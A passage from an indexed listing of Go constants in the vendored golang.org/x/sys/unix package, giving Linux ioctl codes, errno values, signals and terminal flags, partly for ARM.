TIOCM_DSR (line 430) | TIOCM_DSR = 0x100 constant TIOCM_RI (line 431) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 432) | TIOCM_RNG = 0x80 constant TIOCM_SR (line 433) | TIOCM_SR = 0x10 constant TIOCM_ST (line 434) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 435) | TIOCNOTTY = 0x5422 constant TIOCNXCL (line 436) | TIOCNXCL = 0x540d constant TIOCOUTQ (line 437) | TIOCOUTQ = 0x5411 constant TIOCPKT (line 438) | TIOCPKT = 0x5420 constant TIOCSBRK (line 439) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 440) | TIOCSCTTY = 0x540e constant TIOCSERCONFIG (line 441) | TIOCSERCONFIG = 0x5453 constant TIOCSERGETLSR (line 442) | TIOCSERGETLSR = 0x5459 constant TIOCSERGETMULTI (line 443) | TIOCSERGETMULTI = 0x545a constant TIOCSERGSTRUCT (line 444) | TIOCSERGSTRUCT = 0x5458 constant TIOCSERGWILD (line 445) | TIOCSERGWILD = 0x5454 constant TIOCSERSETMULTI (line 446) | TIOCSERSETMULTI = 0x545b constant TIOCSERSWILD (line 447) | TIOCSERSWILD = 0x5455 constant TIOCSER_TEMT (line 448) | TIOCSER_TEMT = 0x1 constant TIOCSETD (line 449) | TIOCSETD = 0x5423 constant TIOCSIG (line 450) | TIOCSIG = 0x40045436 constant TIOCSISO7816 (line 451) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 452) | TIOCSLCKTRMIOS = 0x5457 constant TIOCSPGRP (line 453) | TIOCSPGRP = 0x5410 constant TIOCSPTLCK (line 454) | TIOCSPTLCK = 0x40045431 constant TIOCSRS485 (line 455) | TIOCSRS485 = 0x542f constant TIOCSSERIAL (line 456) | TIOCSSERIAL = 0x541f constant TIOCSSOFTCAR (line 457) | TIOCSSOFTCAR = 0x541a constant TIOCSTI (line 458) | TIOCSTI = 0x5412 constant TIOCSWINSZ (line 459) | TIOCSWINSZ = 0x5414 constant TIOCVHANGUP (line 460) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 461) | TOSTOP = 0x100 constant TUNATTACHFILTER (line 462) | TUNATTACHFILTER = 0x401054d5 constant TUNDETACHFILTER (line 463) | TUNDETACHFILTER = 0x401054d6 constant TUNGETDEVNETNS (line 464) | TUNGETDEVNETNS = 0x54e3 constant TUNGETFEATURES (line 465) | TUNGETFEATURES = 0x800454cf constant TUNGETFILTER (line 466) | TUNGETFILTER = 0x801054db constant TUNGETIFF (line 467) | TUNGETIFF = 0x800454d2 constant TUNGETSNDBUF (line 468) | TUNGETSNDBUF = 0x800454d3 constant TUNGETVNETBE (line 469) | TUNGETVNETBE = 0x800454df constant TUNGETVNETHDRSZ (line 470) | TUNGETVNETHDRSZ = 0x800454d7 constant TUNGETVNETLE (line 471) | TUNGETVNETLE = 0x800454dd constant TUNSETCARRIER (line 472) | TUNSETCARRIER = 0x400454e2 constant TUNSETDEBUG (line 473) | TUNSETDEBUG = 0x400454c9 constant TUNSETFILTEREBPF (line 474) | TUNSETFILTEREBPF = 0x800454e1 constant TUNSETGROUP (line 475) | TUNSETGROUP = 0x400454ce constant TUNSETIFF (line 476) | TUNSETIFF = 0x400454ca constant TUNSETIFINDEX (line 477) | TUNSETIFINDEX = 0x400454da constant TUNSETLINK (line 478) | TUNSETLINK = 0x400454cd constant TUNSETNOCSUM (line 479) | TUNSETNOCSUM = 0x400454c8 constant TUNSETOFFLOAD (line 480) | TUNSETOFFLOAD = 0x400454d0 constant TUNSETOWNER (line 481) | TUNSETOWNER = 0x400454cc constant TUNSETPERSIST (line 482) | TUNSETPERSIST = 0x400454cb constant TUNSETQUEUE (line 483) | TUNSETQUEUE = 0x400454d9 constant TUNSETSNDBUF (line 484) | TUNSETSNDBUF = 0x400454d4 constant TUNSETSTEERINGEBPF (line 485) | TUNSETSTEERINGEBPF = 0x800454e0 constant TUNSETTXFILTER (line 486) | TUNSETTXFILTER = 0x400454d1 constant TUNSETVNETBE (line 487) | TUNSETVNETBE = 0x400454de constant TUNSETVNETHDRSZ (line 488) | TUNSETVNETHDRSZ = 0x400454d8 constant TUNSETVNETLE (line 489) | TUNSETVNETLE = 0x400454dc constant UBI_IOCATT (line 490) | UBI_IOCATT = 0x40186f40 constant UBI_IOCDET (line 491) | UBI_IOCDET = 0x40046f41 constant UBI_IOCEBCH (line 492) | UBI_IOCEBCH = 0x40044f02 constant UBI_IOCEBER (line 493) | UBI_IOCEBER = 0x40044f01 constant UBI_IOCEBISMAP (line 494) | UBI_IOCEBISMAP = 0x80044f05 constant UBI_IOCEBMAP (line 495) | UBI_IOCEBMAP = 0x40084f03 constant UBI_IOCEBUNMAP (line 496) | UBI_IOCEBUNMAP = 0x40044f04 constant UBI_IOCMKVOL (line 497) | UBI_IOCMKVOL = 0x40986f00 constant UBI_IOCRMVOL (line 498) | UBI_IOCRMVOL = 0x40046f01 constant UBI_IOCRNVOL (line 499) | UBI_IOCRNVOL = 0x51106f03 constant UBI_IOCRPEB (line 500) | UBI_IOCRPEB = 0x40046f04 constant UBI_IOCRSVOL (line 501) | UBI_IOCRSVOL = 0x400c6f02 constant UBI_IOCSETVOLPROP (line 502) | UBI_IOCSETVOLPROP = 0x40104f06 constant UBI_IOCSPEB (line 503) | UBI_IOCSPEB = 0x40046f05 constant UBI_IOCVOLCRBLK (line 504) | UBI_IOCVOLCRBLK = 0x40804f07 constant UBI_IOCVOLRMBLK (line 505) | UBI_IOCVOLRMBLK = 0x4f08 constant UBI_IOCVOLUP (line 506) | UBI_IOCVOLUP = 0x40084f00 constant VDISCARD (line 507) | VDISCARD = 0xd constant VEOF (line 508) | VEOF = 0x4 constant VEOL (line 509) | VEOL = 0xb constant VEOL2 (line 510) | VEOL2 = 0x10 constant VMIN (line 511) | VMIN = 0x6 constant VREPRINT (line 512) | VREPRINT = 0xc constant VSTART (line 513) | VSTART = 0x8 constant VSTOP (line 514) | VSTOP = 0x9 constant VSUSP (line 515) | VSUSP = 0xa constant VSWTC (line 516) | VSWTC = 0x7 constant VT1 (line 517) | VT1 = 0x4000 constant VTDLY (line 518) | VTDLY = 0x4000 constant VTIME (line 519) | VTIME = 0x5 constant VWERASE (line 520) | VWERASE = 0xe constant WDIOC_GETBOOTSTATUS (line 521) | WDIOC_GETBOOTSTATUS = 0x80045702 constant WDIOC_GETPRETIMEOUT (line 522) | WDIOC_GETPRETIMEOUT = 0x80045709 constant WDIOC_GETSTATUS (line 523) | WDIOC_GETSTATUS = 0x80045701 constant WDIOC_GETSUPPORT (line 524) | WDIOC_GETSUPPORT = 0x80285700 constant WDIOC_GETTEMP (line 525) | WDIOC_GETTEMP = 0x80045703 constant WDIOC_GETTIMELEFT (line 526) | WDIOC_GETTIMELEFT = 0x8004570a constant WDIOC_GETTIMEOUT (line 527) | WDIOC_GETTIMEOUT = 0x80045707 constant WDIOC_KEEPALIVE (line 528) | WDIOC_KEEPALIVE = 0x80045705 constant WDIOC_SETOPTIONS (line 529) | WDIOC_SETOPTIONS = 0x80045704 constant WORDSIZE (line 530) | WORDSIZE = 0x40 constant XCASE (line 531) | XCASE = 0x4 constant XTABS (line 532) | XTABS = 0x1800 constant _HIDIOCGRAWNAME (line 533) | _HIDIOCGRAWNAME = 0x80804804 constant _HIDIOCGRAWPHYS (line 534) | _HIDIOCGRAWPHYS = 0x80404805 constant _HIDIOCGRAWUNIQ (line 535) | _HIDIOCGRAWUNIQ = 0x80404808 constant EADDRINUSE (line 540) | EADDRINUSE = syscall.Errno(0x62) constant EADDRNOTAVAIL (line 541) | EADDRNOTAVAIL = syscall.Errno(0x63) constant EADV (line 542) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 543) | EAFNOSUPPORT = syscall.Errno(0x61) constant EALREADY (line 544) | EALREADY = syscall.Errno(0x72) constant EBADE (line 545) | EBADE = syscall.Errno(0x34) constant EBADFD (line 546) | EBADFD = syscall.Errno(0x4d) constant EBADMSG (line 547) | EBADMSG = syscall.Errno(0x4a) constant EBADR (line 548) | EBADR = syscall.Errno(0x35) constant EBADRQC (line 549) | EBADRQC = syscall.Errno(0x38) constant EBADSLT (line 550) | EBADSLT = syscall.Errno(0x39) constant EBFONT (line 551) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 552) | ECANCELED = syscall.Errno(0x7d) constant ECHRNG (line 553) | ECHRNG = syscall.Errno(0x2c) constant ECOMM (line 554) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 555) | ECONNABORTED = syscall.Errno(0x67) constant ECONNREFUSED (line 556) | ECONNREFUSED = syscall.Errno(0x6f) constant ECONNRESET (line 557) | ECONNRESET = syscall.Errno(0x68) constant EDEADLK (line 558) | EDEADLK = syscall.Errno(0x23) constant EDEADLOCK (line 559) | EDEADLOCK = syscall.Errno(0x23) constant EDESTADDRREQ (line 560) | EDESTADDRREQ = syscall.Errno(0x59) constant EDOTDOT (line 561) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 562) | EDQUOT = syscall.Errno(0x7a) constant EHOSTDOWN (line 563) | EHOSTDOWN = syscall.Errno(0x70) constant EHOSTUNREACH (line 564) | EHOSTUNREACH = syscall.Errno(0x71) constant EHWPOISON (line 565) | EHWPOISON = syscall.Errno(0x85) constant EIDRM (line 566) | EIDRM = syscall.Errno(0x2b) constant EILSEQ (line 567) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 568) | EINPROGRESS = syscall.Errno(0x73) constant EISCONN (line 569) | EISCONN = syscall.Errno(0x6a) constant EISNAM (line 570) | EISNAM = syscall.Errno(0x78) constant EKEYEXPIRED (line 571) | EKEYEXPIRED = syscall.Errno(0x7f) constant EKEYREJECTED (line 572) | EKEYREJECTED = syscall.Errno(0x81) constant EKEYREVOKED (line 573) | EKEYREVOKED = syscall.Errno(0x80) constant EL2HLT (line 574) | EL2HLT = syscall.Errno(0x33) constant EL2NSYNC (line 575) | EL2NSYNC = syscall.Errno(0x2d) constant EL3HLT (line 576) | EL3HLT = syscall.Errno(0x2e) constant EL3RST (line 577) | EL3RST = syscall.Errno(0x2f) constant ELIBACC (line 578) | ELIBACC = syscall.Errno(0x4f) constant ELIBBAD (line 579) | ELIBBAD = syscall.Errno(0x50) constant ELIBEXEC (line 580) | ELIBEXEC = syscall.Errno(0x53) constant ELIBMAX (line 581) | ELIBMAX = syscall.Errno(0x52) constant ELIBSCN (line 582) | ELIBSCN = syscall.Errno(0x51) constant ELNRNG (line 583) | ELNRNG = syscall.Errno(0x30) constant ELOOP (line 584) | ELOOP = syscall.Errno(0x28) constant EMEDIUMTYPE (line 585) | EMEDIUMTYPE = syscall.Errno(0x7c) constant EMSGSIZE (line 586) | EMSGSIZE = syscall.Errno(0x5a) constant EMULTIHOP (line 587) | EMULTIHOP = syscall.Errno(0x48) constant ENAMETOOLONG (line 588) | ENAMETOOLONG = syscall.Errno(0x24) constant ENAVAIL (line 589) | ENAVAIL = syscall.Errno(0x77) constant ENETDOWN (line 590) | ENETDOWN = syscall.Errno(0x64) constant ENETRESET (line 591) | ENETRESET = syscall.Errno(0x66) constant ENETUNREACH (line 592) | ENETUNREACH = syscall.Errno(0x65) constant ENOANO (line 593) | ENOANO = syscall.Errno(0x37) constant ENOBUFS (line 594) | ENOBUFS = syscall.Errno(0x69) constant ENOCSI (line 595) | ENOCSI = syscall.Errno(0x32) constant ENODATA (line 596) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 597) | ENOKEY = syscall.Errno(0x7e) constant ENOLCK (line 598) | ENOLCK = syscall.Errno(0x25) constant ENOLINK (line 599) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 600) | ENOMEDIUM = syscall.Errno(0x7b) constant ENOMSG (line 601) | ENOMSG = syscall.Errno(0x2a) constant ENONET (line 602) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 603) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 604) | ENOPROTOOPT = syscall.Errno(0x5c) constant ENOSR (line 605) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 606) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 607) | ENOSYS = syscall.Errno(0x26) constant ENOTCONN (line 608) | ENOTCONN = syscall.Errno(0x6b) constant ENOTEMPTY (line 609) | ENOTEMPTY = syscall.Errno(0x27) constant ENOTNAM (line 610) | ENOTNAM = syscall.Errno(0x76) constant ENOTRECOVERABLE (line 611) | ENOTRECOVERABLE = syscall.Errno(0x83) constant ENOTSOCK (line 612) | ENOTSOCK = syscall.Errno(0x58) constant ENOTSUP (line 613) | ENOTSUP = syscall.Errno(0x5f) constant ENOTUNIQ (line 614) | ENOTUNIQ = syscall.Errno(0x4c) constant EOPNOTSUPP (line 615) | EOPNOTSUPP = syscall.Errno(0x5f) constant EOVERFLOW (line 616) | EOVERFLOW = syscall.Errno(0x4b) constant EOWNERDEAD (line 617) | EOWNERDEAD = syscall.Errno(0x82) constant EPFNOSUPPORT (line 618) | EPFNOSUPPORT = syscall.Errno(0x60) constant EPROTO (line 619) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 620) | EPROTONOSUPPORT = syscall.Errno(0x5d) constant EPROTOTYPE (line 621) | EPROTOTYPE = syscall.Errno(0x5b) constant EREMCHG (line 622) | EREMCHG = syscall.Errno(0x4e) constant EREMOTE (line 623) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 624) | EREMOTEIO = syscall.Errno(0x79) constant ERESTART (line 625) | ERESTART = syscall.Errno(0x55) constant ERFKILL (line 626) | ERFKILL = syscall.Errno(0x84) constant ESHUTDOWN (line 627) | ESHUTDOWN = syscall.Errno(0x6c) constant ESOCKTNOSUPPORT (line 628) | ESOCKTNOSUPPORT = syscall.Errno(0x5e) constant ESRMNT (line 629) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 630) | ESTALE = syscall.Errno(0x74) constant ESTRPIPE (line 631) | ESTRPIPE = syscall.Errno(0x56) constant ETIME (line 632) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 633) | ETIMEDOUT = syscall.Errno(0x6e) constant ETOOMANYREFS (line 634) | ETOOMANYREFS = syscall.Errno(0x6d) constant EUCLEAN (line 635) | EUCLEAN = syscall.Errno(0x75) constant EUNATCH (line 636) | EUNATCH = syscall.Errno(0x31) constant EUSERS (line 637) | EUSERS = syscall.Errno(0x57) constant EXFULL (line 638) | EXFULL = syscall.Errno(0x36) constant SIGBUS (line 643) | SIGBUS = syscall.Signal(0x7) constant SIGCHLD (line 644) | SIGCHLD = syscall.Signal(0x11) constant SIGCLD (line 645) | SIGCLD = syscall.Signal(0x11) constant SIGCONT (line 646) | SIGCONT = syscall.Signal(0x12) constant SIGIO (line 647) | SIGIO = syscall.Signal(0x1d) constant SIGPOLL (line 648) | SIGPOLL = syscall.Signal(0x1d) constant SIGPROF (line 649) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 650) | SIGPWR = syscall.Signal(0x1e) constant SIGSTKFLT (line 651) | SIGSTKFLT = syscall.Signal(0x10) constant SIGSTOP (line 652) | SIGSTOP = syscall.Signal(0x13) constant SIGSYS (line 653) | SIGSYS = syscall.Signal(0x1f) constant SIGTSTP (line 654) | SIGTSTP = syscall.Signal(0x14) constant SIGTTIN (line 655) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 656) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 657) | SIGURG = syscall.Signal(0x17) constant SIGUSR1 (line 658) | SIGUSR1 = syscall.Signal(0xa) constant SIGUSR2 (line 659) | SIGUSR2 = syscall.Signal(0xc) constant SIGVTALRM (line 660) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 661) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 662) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 663) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_arm.go constant B1000000 (line 14) | B1000000 = 0x1008 constant B115200 (line 15) | B115200 = 0x1002 constant B1152000 (line 16) | B1152000 = 0x1009 constant B1500000 (line 17) | B1500000 = 0x100a constant B2000000 (line 18) | B2000000 = 0x100b constant B230400 (line 19) | B230400 = 0x1003 constant B2500000 (line 20) | B2500000 = 0x100c constant B3000000 (line 21) | B3000000 = 0x100d constant B3500000 (line 22) | B3500000 = 0x100e constant B4000000 (line 23) | B4000000 = 0x100f constant B460800 (line 24) | B460800 = 0x1004 constant B500000 (line 25) | B500000 = 0x1005 constant B57600 (line 26) | B57600 = 0x1001 constant B576000 (line 27) | B576000 = 0x1006 constant B921600 (line 28) | B921600 = 0x1007 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x80041270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x40041271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x1277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x1261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x1265 constant BLKFRASET (line 36) | BLKFRASET = 0x1264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x80081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x1260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x80041272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x1278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x1279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x127b constant BLKRAGET (line 43) | BLKRAGET = 0x1263 constant BLKRASET (line 44) | BLKRASET = 0x1262 constant BLKROGET (line 45) | BLKROGET = 0x125e constant BLKROSET (line 46) | BLKROSET = 0x125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x127e constant BLKRRPART (line 48) | BLKRRPART = 0x125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x1267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x1266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x1268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x127f constant BOTHER (line 54) | BOTHER = 0x1000 constant BS1 (line 55) | BS1 = 0x2000 constant BSDLY (line 56) | BSDLY = 0x2000 constant CBAUD (line 57) | CBAUD = 0x100f constant CBAUDEX (line 58) | CBAUDEX = 0x1000 constant CIBAUD (line 59) | CIBAUD = 0x100f0000 constant CLOCAL (line 60) | CLOCAL = 0x800 constant CR1 (line 61) | CR1 = 0x200 constant CR2 (line 62) | CR2 = 0x400 constant CR3 (line 63) | CR3 = 0x600 constant CRDLY (line 64) | CRDLY = 0x600 constant CREAD (line 65) | CREAD = 0x80 constant CS6 (line 66) | CS6 = 0x10 constant CS7 (line 67) | CS7 = 0x20 constant CS8 (line 68) | CS8 = 0x30 constant CSIZE (line 69) | CSIZE = 0x30 constant CSTOPB (line 70) | CSTOPB = 0x40 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x81484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x80104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x200 constant ECHOE (line 74) | ECHOE = 0x10 constant ECHOK (line 75) | ECHOK = 0x20 constant ECHOKE (line 76) | ECHOKE = 0x800 constant ECHONL (line 77) | ECHONL = 0x40 constant ECHOPRT (line 78) | ECHOPRT = 0x400 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x800 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000 constant FF1 (line 83) | FF1 = 0x8000 constant FFDLY (line 84) | FFDLY = 0x8000 constant FICLONE (line 85) | FICLONE = 0x40049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x4020940d constant FLUSHO (line 87) | FLUSHO = 0x1000 constant FS_IOC_ENABLE_VERITY (line 88) | FS_IOC_ENABLE_VERITY = 0x40806685 constant FS_IOC_GETFLAGS (line 89) | FS_IOC_GETFLAGS = 0x80046601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 90) | FS_IOC_GET_ENCRYPTION_NONCE = 0x8010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 91) | FS_IOC_GET_ENCRYPTION_POLICY = 0x400c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 92) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x40106614 constant FS_IOC_SETFLAGS (line 93) | FS_IOC_SETFLAGS = 0x40046602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 94) | FS_IOC_SET_ENCRYPTION_POLICY = 0x800c6613 constant F_GETLK (line 95) | F_GETLK = 0xc constant F_GETLK64 (line 96) | F_GETLK64 = 0xc constant F_GETOWN (line 97) | F_GETOWN = 0x9 constant F_RDLCK (line 98) | F_RDLCK = 0x0 constant F_SETLK (line 99) | F_SETLK = 0xd constant F_SETLK64 (line 100) | F_SETLK64 = 0xd constant F_SETLKW (line 101) | F_SETLKW = 0xe constant F_SETLKW64 (line 102) | F_SETLKW64 = 0xe constant F_SETOWN (line 103) | F_SETOWN = 0x8 constant F_UNLCK (line 104) | F_UNLCK = 0x2 constant F_WRLCK (line 105) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 106) | HIDIOCGRAWINFO = 0x80084803 constant HIDIOCGRDESC (line 107) | HIDIOCGRDESC = 0x90044802 constant HIDIOCGRDESCSIZE (line 108) | HIDIOCGRDESCSIZE = 0x80044801 constant HUPCL (line 109) | HUPCL = 0x400 constant ICANON (line 110) | ICANON = 0x2 constant IEXTEN (line 111) | IEXTEN = 0x8000 constant IN_CLOEXEC (line 112) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 113) | IN_NONBLOCK = 0x800 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 114) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x7b9 constant ISIG (line 115) | ISIG = 0x1 constant IUCLC (line 116) | IUCLC = 0x200 constant IXOFF (line 117) | IXOFF = 0x1000 constant IXON (line 118) | IXON = 0x400 constant MAP_ANON (line 119) | MAP_ANON = 0x20 constant MAP_ANONYMOUS (line 120) | MAP_ANONYMOUS = 0x20 constant MAP_DENYWRITE (line 121) | MAP_DENYWRITE = 0x800 constant MAP_EXECUTABLE (line 122) | MAP_EXECUTABLE = 0x1000 constant MAP_GROWSDOWN (line 123) | MAP_GROWSDOWN = 0x100 constant MAP_HUGETLB (line 124) | MAP_HUGETLB = 0x40000 constant MAP_LOCKED (line 125) | MAP_LOCKED = 0x2000 constant MAP_NONBLOCK (line 126) | MAP_NONBLOCK = 0x10000 constant MAP_NORESERVE (line 127) | MAP_NORESERVE = 0x4000 constant MAP_POPULATE (line 128) | MAP_POPULATE = 0x8000 constant MAP_STACK (line 129) | MAP_STACK = 0x20000 constant MAP_SYNC (line 130) | MAP_SYNC = 0x80000 constant MCL_CURRENT (line 131) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 132) | MCL_FUTURE = 0x2 constant MCL_ONFAULT (line 133) | MCL_ONFAULT = 0x4 constant MEMERASE (line 134) | MEMERASE = 0x40084d02 constant MEMERASE64 (line 135) | MEMERASE64 = 0x40104d14 constant MEMGETBADBLOCK (line 136) | MEMGETBADBLOCK = 0x40084d0b constant MEMGETINFO (line 137) | MEMGETINFO = 0x80204d01 constant MEMGETOOBSEL (line 138) | MEMGETOOBSEL = 0x80c84d0a constant MEMGETREGIONCOUNT (line 139) | MEMGETREGIONCOUNT = 0x80044d07 constant MEMISLOCKED (line 140) | MEMISLOCKED = 0x80084d17 constant MEMLOCK (line 141) | MEMLOCK = 0x40084d05 constant MEMREAD (line 142) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 143) | MEMREADOOB = 0xc00c4d04 constant MEMSETBADBLOCK (line 144) | MEMSETBADBLOCK = 0x40084d0c constant MEMUNLOCK (line 145) | MEMUNLOCK = 0x40084d06 constant MEMWRITEOOB (line 146) | MEMWRITEOOB = 0xc00c4d03 constant MTDFILEMODE (line 147) | MTDFILEMODE = 0x4d13 constant NFDBITS (line 148) | NFDBITS = 0x20 constant NLDLY (line 149) | NLDLY = 0x100 constant NOFLSH (line 150) | NOFLSH = 0x80 constant NS_GET_NSTYPE (line 151) | NS_GET_NSTYPE = 0xb703 constant NS_GET_OWNER_UID (line 152) | NS_GET_OWNER_UID = 0xb704 constant NS_GET_PARENT (line 153) | NS_GET_PARENT = 0xb702 constant NS_GET_USERNS (line 154) | NS_GET_USERNS = 0xb701 constant OLCUC (line 155) | OLCUC = 0x2 constant ONLCR (line 156) | ONLCR = 0x4 constant OTPERASE (line 157) | OTPERASE = 0x400c4d19 constant OTPGETREGIONCOUNT (line 158) | OTPGETREGIONCOUNT = 0x40044d0e constant OTPGETREGIONINFO (line 159) | OTPGETREGIONINFO = 0x400c4d0f constant OTPLOCK (line 160) | OTPLOCK = 0x800c4d10 constant OTPSELECT (line 161) | OTPSELECT = 0x80044d0d constant O_APPEND (line 162) | O_APPEND = 0x400 constant O_ASYNC (line 163) | O_ASYNC = 0x2000 constant O_CLOEXEC (line 164) | O_CLOEXEC = 0x80000 constant O_CREAT (line 165) | O_CREAT = 0x40 constant O_DIRECT (line 166) | O_DIRECT = 0x10000 constant O_DIRECTORY (line 167) | O_DIRECTORY = 0x4000 constant O_DSYNC (line 168) | O_DSYNC = 0x1000 constant O_EXCL (line 169) | O_EXCL = 0x80 constant O_FSYNC (line 170) | O_FSYNC = 0x101000 constant O_LARGEFILE (line 171) | O_LARGEFILE = 0x20000 constant O_NDELAY (line 172) | O_NDELAY = 0x800 constant O_NOATIME (line 173) | O_NOATIME = 0x40000 constant O_NOCTTY (line 174) | O_NOCTTY = 0x100 constant O_NOFOLLOW (line 175) | O_NOFOLLOW = 0x8000 constant O_NONBLOCK (line 176) | O_NONBLOCK = 0x800 constant O_PATH (line 177) | O_PATH = 0x200000 constant O_RSYNC (line 178) | O_RSYNC = 0x101000 constant O_SYNC (line 179) | O_SYNC = 0x101000 constant O_TMPFILE (line 180) | O_TMPFILE = 0x404000 constant O_TRUNC (line 181) | O_TRUNC = 0x200 constant PARENB (line 182) | PARENB = 0x100 constant PARODD (line 183) | PARODD = 0x200 constant PENDIN (line 184) | PENDIN = 0x4000 constant PERF_EVENT_IOC_DISABLE (line 185) | PERF_EVENT_IOC_DISABLE = 0x2401 constant PERF_EVENT_IOC_ENABLE (line 186) | PERF_EVENT_IOC_ENABLE = 0x2400 constant PERF_EVENT_IOC_ID (line 187) | PERF_EVENT_IOC_ID = 0x80042407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 188) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x4004240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 189) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x40042409 constant PERF_EVENT_IOC_PERIOD (line 190) | PERF_EVENT_IOC_PERIOD = 0x40082404 constant PERF_EVENT_IOC_QUERY_BPF (line 191) | PERF_EVENT_IOC_QUERY_BPF = 0xc004240a constant PERF_EVENT_IOC_REFRESH (line 192) | PERF_EVENT_IOC_REFRESH = 0x2402 constant PERF_EVENT_IOC_RESET (line 193) | PERF_EVENT_IOC_RESET = 0x2403 constant PERF_EVENT_IOC_SET_BPF (line 194) | PERF_EVENT_IOC_SET_BPF = 0x40042408 constant PERF_EVENT_IOC_SET_FILTER (line 195) | PERF_EVENT_IOC_SET_FILTER = 0x40042406 constant PERF_EVENT_IOC_SET_OUTPUT (line 196) | PERF_EVENT_IOC_SET_OUTPUT = 0x2405 constant PPPIOCATTACH (line 197) | PPPIOCATTACH = 0x4004743d constant PPPIOCATTCHAN (line 198) | PPPIOCATTCHAN = 0x40047438 constant PPPIOCBRIDGECHAN (line 199) | PPPIOCBRIDGECHAN = 0x40047435 constant PPPIOCCONNECT (line 200) | PPPIOCCONNECT = 0x4004743a constant PPPIOCDETACH (line 201) | PPPIOCDETACH = 0x4004743c constant PPPIOCDISCONN (line 202) | PPPIOCDISCONN = 0x7439 constant PPPIOCGASYNCMAP (line 203) | PPPIOCGASYNCMAP = 0x80047458 constant PPPIOCGCHAN (line 204) | PPPIOCGCHAN = 0x80047437 constant PPPIOCGDEBUG (line 205) | PPPIOCGDEBUG = 0x80047441 constant PPPIOCGFLAGS (line 206) | PPPIOCGFLAGS = 0x8004745a constant PPPIOCGIDLE (line 207) | PPPIOCGIDLE = 0x8008743f constant PPPIOCGIDLE32 (line 208) | PPPIOCGIDLE32 = 0x8008743f constant PPPIOCGIDLE64 (line 209) | PPPIOCGIDLE64 = 0x8010743f constant PPPIOCGL2TPSTATS (line 210) | PPPIOCGL2TPSTATS = 0x80487436 constant PPPIOCGMRU (line 211) | PPPIOCGMRU = 0x80047453 constant PPPIOCGRASYNCMAP (line 212) | PPPIOCGRASYNCMAP = 0x80047455 constant PPPIOCGUNIT (line 213) | PPPIOCGUNIT = 0x80047456 constant PPPIOCGXASYNCMAP (line 214) | PPPIOCGXASYNCMAP = 0x80207450 constant PPPIOCSACTIVE (line 215) | PPPIOCSACTIVE = 0x40087446 constant PPPIOCSASYNCMAP (line 216) | PPPIOCSASYNCMAP = 0x40047457 constant PPPIOCSCOMPRESS (line 217) | PPPIOCSCOMPRESS = 0x400c744d constant PPPIOCSDEBUG (line 218) | PPPIOCSDEBUG = 0x40047440 constant PPPIOCSFLAGS (line 219) | PPPIOCSFLAGS = 0x40047459 constant PPPIOCSMAXCID (line 220) | 